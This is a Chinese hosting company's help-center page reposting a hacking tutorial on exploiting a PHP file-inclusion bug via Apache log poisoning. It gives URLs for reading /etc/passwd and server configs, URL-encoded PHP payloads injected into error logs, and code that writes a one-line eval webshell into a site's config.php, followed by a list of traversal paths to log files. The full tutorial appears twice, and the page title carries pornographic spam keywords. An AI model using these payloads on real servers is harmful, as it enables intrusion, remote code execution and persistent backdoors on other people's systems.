激情五月天婷婷,亚洲愉拍一区二区三区,日韩视频一区,a√天堂中文官网8

<ul id="buwfs"><strike id="buwfs"><strong id="buwfs"></strong></strike></ul>
    <output id="buwfs"></output>
  • <dfn id="buwfs"><source id="buwfs"></source></dfn>
      <dfn id="buwfs"><td id="buwfs"></td></dfn>
      <div id="buwfs"><small id="buwfs"></small></div>
      <dfn id="buwfs"><source id="buwfs"></source></dfn>
      1. <dfn id="buwfs"><td id="buwfs"></td></dfn>
        始創(chuàng)于2000年 股票代碼:831685
        咨詢熱線:0371-60135900 注冊有禮 登錄
        • 掛牌上市企業(yè)
        • 60秒人工響應
        • 99.99%連通率
        • 7*24h人工
        • 故障100倍補償
        全部產(chǎn)品
        您的位置: 網(wǎng)站首頁 > 幫助中心>文章內(nèi)容

        黑客滲透linux下載備份取shell

        發(fā)布時間:  2012/8/15 17:52:35

        關(guān)于php包含Apache日志的利用,其實也就是利用提交的網(wǎng)址里有php語句,然后再被Apache服務(wù)器的日志記錄,然后php再去包含執(zhí)行,從而包含了去執(zhí)行。當然,這種辦法最大的弊端是Apache日志肯定會過大,回應的時候當然會超時什么的,所以也是受條件限制的。全當一種研究算了。下面是我的測試過程,我覺得很有意思,你也看看。
        比如說,在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
        以下是引用片段:
        <? include($zizzy); ?>   //包含變量$zizzy


        你可以
        http://xxx.com/z.php?zizzy=/etc/inetd.conf
        http://xxx.com/z.php?zizzy=/proc/cpuinfo
        http://xxx.com/z.php?zizzy=/etc/passwd

        就可以利用包含語句來查看一些系統(tǒng)環(huán)境和密碼檔文件。

        那么關(guān)于日志包含下面我們來看:
        比如我們的Apache的服務(wù)器配置文件位置在這里
        /usr/local/apache/conf/httpd.conf
        那么我們來包含一下httpd.conf,來看下路徑信息什么的
        http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

        讀出Apache的配置信息,這里列出部分信息。
        <VirtualHost 218.63.89.2>
        User #3
        Group silver
        ServerAdmin webmaster@xxx.com
        DocumentRoot /home/virtual/www.xxx.com
        ServerName www.xxx.com
        ServerAlias xxx.com
        ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
        CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
        ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
        Alias /icons/ /home/virtual/www.xxx.com/icons
        </VirtualHost>

        而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
        就可以讀出Apache的錯誤日志記錄

        [Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
        exist: /home/virtual/www.xxx.com/hack.php
        [Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
        exist: /home/virtual/www.xxx.com/111111111.php
        [Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
        exist: /home/virtual/www.xxx.com/22222.php3
        [Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/forum
        [Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/blog
        [Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/kkkkkkkk

        而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來,只不過文件會很大,那也沒意思測試下去了,那怎么利用呢。

        比如我們提交要提交這句,<?phpinfo();?> //查看php的相關(guān)信息
        在這里,我們只能提交URL編碼模式,因為我在測試中發(fā)現(xiàn),<?的標記并不被記錄,只有轉(zhuǎn)換成URL編碼提交才會被完整記錄。

        在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過了的<?phpinfo();?>,我們提交
        http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

        這樣肯定會報出錯找不到頁面,而一出錯就被記在錯誤日志里了
        http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
        這樣這個日志文件就被包含成了phpinfo的信息,而回顯也就成了一個顯示php信息的頁面。


        如果可以的話(能夠執(zhí)行系統(tǒng)命令,也就是safe_mode開著的時候),
        這樣子也不錯,
        <?system("ls+-la+/home");?>   //執(zhí)行命令列出home下的文件列表,記得轉(zhuǎn)換為URL格式哦。

        /home/
        total 9
        -rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
        drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
        -rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
        -rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
        -rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
        -rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
        -rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
        drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
        -rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

        這樣就列出了home下的文件
        或者直接一句話木馬<?eval($_POST[cmd]);?>,
        這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
        我們提交
        http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

        因為上面那個很不實際,我在測試中發(fā)現(xiàn)日志動不動就是幾十兆,那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用,也比上面那種慢的要死好很多。

        比如還是這句一句話木馬
        <?eval($_POST[cmd]);?>  

        到這里你也許就想到了,這是個很不錯的辦法。接著看,如何寫入就成了個問題,用這句,
        fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件,然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務(wù)端語句。連起來表達成php語句就是

        <?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
        fclose($fp);?>   //在config.php里寫入一句木馬語句

        我們提交這句,再讓Apache記錄到錯誤日志里,再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功。
        轉(zhuǎn)換為
        %3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
        config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
        %2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
        fclose%28%24fp%29%3B%3F%3E
        我們提交
        http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
        %2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
        %22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
        cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

        這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。
        我們再來包含日志,提交
        http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

        這樣webshell就寫入成功了,config.php里就寫入一句木馬語句
        OK.
        http://www.xxx.com/forum/config.php這個就成了我們的webshell
        直接用lanker的客戶端一連,主機就是你的了。

        PS:上面講的,前提是文件夾權(quán)限必須可寫 ,一定要-rwxrwxrwx(777)才能繼續(xù),這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用

        其他的日志路徑,你可以去猜,也可以參照這里。
        附:收集的一些日志路徑
        ../../../../../../../../../../var/log/httpd/access_log
        ../../../../../../../../../../var/log/httpd/error_log
        ../apache/logs/error.log
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        ../../../../../../../../../../etc/httpd/logs/acces_log
        ../../../../../../../../../../etc/httpd/logs/acces.log
        ../../../../../../../../../../etc/httpd/logs/error_log
        ../../../../../../../../../../etc/httpd/logs/error.log
        ../../../../../../../../../../var/www/logs/access_log
        ../../../../../../../../../../var/www/logs/access.log
        ../../../../../../../../../../usr/local/apache/logs/access_log
        ../../../../../../../../../../usr/local/apache/logs/access.log
        ../../../../../../../../../../var/log/apache/access_log
        ../../../../../../../../../../var/log/apache/access.log
        ../../../../../../../../../../var/log/access_log
        ../../../../../../../../../../var/www/logs/error_log
        ../../../../../../../../../../var/www/logs/error.log
        ../../../../../../../../../../usr/local/apache/logs/error_log
        ../../../../../../../../../../usr/local/apache/logs/error.log
        ../../../../../../../../../../var/log/apache/error_log
        ../../../../../../../../../../var/log/apache/error.log
        ../../../../../../../../../../var/log/access_log
        ../../../../../../../../../../var/log/error_log
        /var/log/httpd/access_log     
        /var/log/httpd/error_log    
        ../apache/logs/error.log    
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        /etc/httpd/logs/acces_log
        /etc/httpd/logs/acces.log
        /etc/httpd/logs/error_log
        /etc/httpd/logs/error.log
        /var/www/logs/access_log
        /var/www/logs/access.log
        /usr/local/apache/logs/access_log
        /usr/local/apache/logs/access.log
        /var/log/apache/access_log
        /var/log/apache/access.log
        /var/log/access_log
        /var/www/logs/error_log
        /var/www/logs/error.log
        /usr/local/apache/logs/error_log
        /usr/local/apache/logs/error.log
        /var/log/apache/error_log
        /var/log/apache/error.log
        /var/log/access_log
        /var/log/error_log

        關(guān)于php包含Apache日志的利用,其實也就是利用提交的網(wǎng)址里有php語句,然后再被Apache服務(wù)器的日志記錄,然后php再去包含執(zhí)行,從而包含了去執(zhí)行。當然,這種辦法最大的弊端是Apache日志肯定會過大,回應的時候當然會超時什么的,所以也是受條件限制的。全當一種研究算了。下面是我的測試過程,我覺得很有意思,你也看看。
        比如說,在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
        以下是引用片段:
        <? include($zizzy); ?>   //包含變量$zizzy


        你可以
        http://xxx.com/z.php?zizzy=/etc/inetd.conf
        http://xxx.com/z.php?zizzy=/proc/cpuinfo
        http://xxx.com/z.php?zizzy=/etc/passwd

        就可以利用包含語句來查看一些系統(tǒng)環(huán)境和密碼檔文件。

        那么關(guān)于日志包含下面我們來看:
        比如我們的Apache的服務(wù)器配置文件位置在這里
        /usr/local/apache/conf/httpd.conf
        那么我們來包含一下httpd.conf,來看下路徑信息什么的
        http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

        讀出Apache的配置信息,這里列出部分信息。
        <VirtualHost 218.63.89.2>
        User #3
        Group silver
        ServerAdmin webmaster@xxx.com
        DocumentRoot /home/virtual/www.xxx.com
        ServerName www.xxx.com
        ServerAlias xxx.com
        ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
        CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
        ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
        Alias /icons/ /home/virtual/www.xxx.com/icons
        </VirtualHost>

        而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
        就可以讀出Apache的錯誤日志記錄

        [Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
        exist: /home/virtual/www.xxx.com/hack.php
        [Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
        exist: /home/virtual/www.xxx.com/111111111.php
        [Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
        exist: /home/virtual/www.xxx.com/22222.php3
        [Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/forum
        [Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/blog
        [Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
        directory as script: /home/virtual/www.xxx.com/kkkkkkkk

        而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來,只不過文件會很大,那也沒意思測試下去了,那怎么利用呢。

        比如我們提交要提交這句,<?phpinfo();?> //查看php的相關(guān)信息
        在這里,我們只能提交URL編碼模式,因為我在測試中發(fā)現(xiàn),<?的標記并不被記錄,只有轉(zhuǎn)換成URL編碼提交才會被完整記錄。

        在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過了的<?phpinfo();?>,我們提交
        http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

        這樣肯定會報出錯找不到頁面,而一出錯就被記在錯誤日志里了
        http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
        這樣這個日志文件就被包含成了phpinfo的信息,而回顯也就成了一個顯示php信息的頁面。


        如果可以的話(能夠執(zhí)行系統(tǒng)命令,也就是safe_mode開著的時候),
        這樣子也不錯,
        <?system("ls+-la+/home");?>   //執(zhí)行命令列出home下的文件列表,記得轉(zhuǎn)換為URL格式哦。

        /home/
        total 9
        -rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
        drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
        -rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
        -rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
        -rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
        -rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
        -rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
        drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
        -rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

        這樣就列出了home下的文件
        或者直接一句話木馬<?eval($_POST[cmd]);?>,
        這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
        我們提交
        http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

        因為上面那個很不實際,我在測試中發(fā)現(xiàn)日志動不動就是幾十兆,那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用,也比上面那種慢的要死好很多。

        比如還是這句一句話木馬
        <?eval($_POST[cmd]);?>  

        到這里你也許就想到了,這是個很不錯的辦法。接著看,如何寫入就成了個問題,用這句,
        fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件,然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務(wù)端語句。連起來表達成php語句就是

        <?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
        fclose($fp);?>   //在config.php里寫入一句木馬語句

        我們提交這句,再讓Apache記錄到錯誤日志里,再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功。
        轉(zhuǎn)換為
        %3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
        config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
        %2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
        fclose%28%24fp%29%3B%3F%3E
        我們提交
        http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
        %2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
        %22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
        cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

        這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。
        我們再來包含日志,提交
        http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

        這樣webshell就寫入成功了,config.php里就寫入一句木馬語句
        OK.
        http://www.xxx.com/forum/config.php這個就成了我們的webshell
        直接用lanker的客戶端一連,主機就是你的了。

        PS:上面講的,前提是文件夾權(quán)限必須可寫 ,一定要-rwxrwxrwx(777)才能繼續(xù),這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用

        其他的日志路徑,你可以去猜,也可以參照這里。
        附:收集的一些日志路徑
        ../../../../../../../../../../var/log/httpd/access_log
        ../../../../../../../../../../var/log/httpd/error_log
        ../apache/logs/error.log
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        ../../../../../../../../../../etc/httpd/logs/acces_log
        ../../../../../../../../../../etc/httpd/logs/acces.log
        ../../../../../../../../../../etc/httpd/logs/error_log
        ../../../../../../../../../../etc/httpd/logs/error.log
        ../../../../../../../../../../var/www/logs/access_log
        ../../../../../../../../../../var/www/logs/access.log
        ../../../../../../../../../../usr/local/apache/logs/access_log
        ../../../../../../../../../../usr/local/apache/logs/access.log
        ../../../../../../../../../../var/log/apache/access_log
        ../../../../../../../../../../var/log/apache/access.log
        ../../../../../../../../../../var/log/access_log
        ../../../../../../../../../../var/www/logs/error_log
        ../../../../../../../../../../var/www/logs/error.log
        ../../../../../../../../../../usr/local/apache/logs/error_log
        ../../../../../../../../../../usr/local/apache/logs/error.log
        ../../../../../../../../../../var/log/apache/error_log
        ../../../../../../../../../../var/log/apache/error.log
        ../../../../../../../../../../var/log/access_log
        ../../../../../../../../../../var/log/error_log
        /var/log/httpd/access_log     
        /var/log/httpd/error_log    
        ../apache/logs/error.log    
        ../apache/logs/access.log
        ../../apache/logs/error.log
        ../../apache/logs/access.log
        ../../../apache/logs/error.log
        ../../../apache/logs/access.log
        /etc/httpd/logs/acces_log
        /etc/httpd/logs/acces.log
        /etc/httpd/logs/error_log
        /etc/httpd/logs/error.log
        /var/www/logs/access_log
        /var/www/logs/access.log
        /usr/local/apache/logs/access_log
        /usr/local/apache/logs/access.log
        /var/log/apache/access_log
        /var/log/apache/access.log
        /var/log/access_log
        /var/www/logs/error_log
        /var/www/logs/error.log
        /usr/local/apache/logs/error_log
        /usr/local/apache/logs/error.log
        /var/log/apache/error_log
        /var/log/apache/error.log
        /var/log/access_log
        /var/log/error_log

        億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
           聯(lián)系:億恩小凡
           QQ:89317007
           電話:0371-63322206


        本文出自:億恩科技【mszdt.com】

        服務(wù)器租用/服務(wù)器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]

      2. 您可能在找
      3. 億恩北京公司:
      4. 經(jīng)營性ICP/ISP證:京B2-20150015
      5. 億恩鄭州公司:
      6. 經(jīng)營性ICP/ISP/IDC證:豫B1.B2-20060070
      7. 億恩南昌公司:
      8. 經(jīng)營性ICP/ISP證:贛B2-20080012
      9. 服務(wù)器/云主機 24小時售后服務(wù)電話:0371-60135900
      10. 虛擬主機/智能建站 24小時售后服務(wù)電話:0371-60135900
      11. 專注服務(wù)器托管17年
        掃掃關(guān)注-微信公眾號
        0371-60135900
        Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號
          0
         
         
         
         

        0371-60135900
        7*24小時客服服務(wù)熱線